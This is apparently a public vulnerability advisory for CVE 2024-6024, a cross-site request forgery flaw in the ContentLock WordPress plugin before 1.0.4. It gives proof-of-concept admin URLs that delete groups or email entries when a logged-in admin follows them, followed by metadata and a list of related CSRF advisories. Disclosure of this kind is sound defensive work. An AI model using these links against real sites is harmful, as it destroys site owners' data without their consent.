ContentLock < 1.0.4 – Groups/Emails Deletion via CSRF | CVE 2024-6024 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when deleting groups or emails, which could allow attackers to make a logged in admin remove them via a CSRF attack

Proof of Concept

To delete a group, have an admin follow this link (where `<<ROW_ID>>` is a valid group):

`https://example.com/wp-admin/admin.php?page=contentlock&action=delete_row&row_id=<<ROW_ID>>`

To delete an email address, have an admin follow this link (where `<<GROUP>>` is a valid and `<<ROW_ID>>` is any valid ID):

`https://example.com/wp-admin/admin.php?page=contentlock&group=2&action=delete_row&row_id=2`

Affects Plugins

Fixed in 1.0.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

3d2cdb4f-b7e1-4691-90d1-cddde7f5858e

Timeline

Publicly Published

2024-06-21 (about 1 year ago)

Added

2024-06-21 (about 1 year ago)

Last Updated

2025-03-25 (about 9 months ago)

Other

Published

Title

Published

2024-07-23

Title

LiteSpeed Cache < 6.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-04-19

Title

WordPress Automatic Plugin < 3.93.0 Cross-Site Request Forgery

Published

2025-06-27

Title

My Wp Brand < 1.1.4 - Cross-Site Request Forgery

Published

2023-10-13

Title

IRivYou <= 2.2.1 - Arbitrary Settings Update via CSRF

Published

2024-07-10

Title

HTML Forms – Simple WordPress Forms Plugin < 1.3.34 - Bulk Delete via CSRF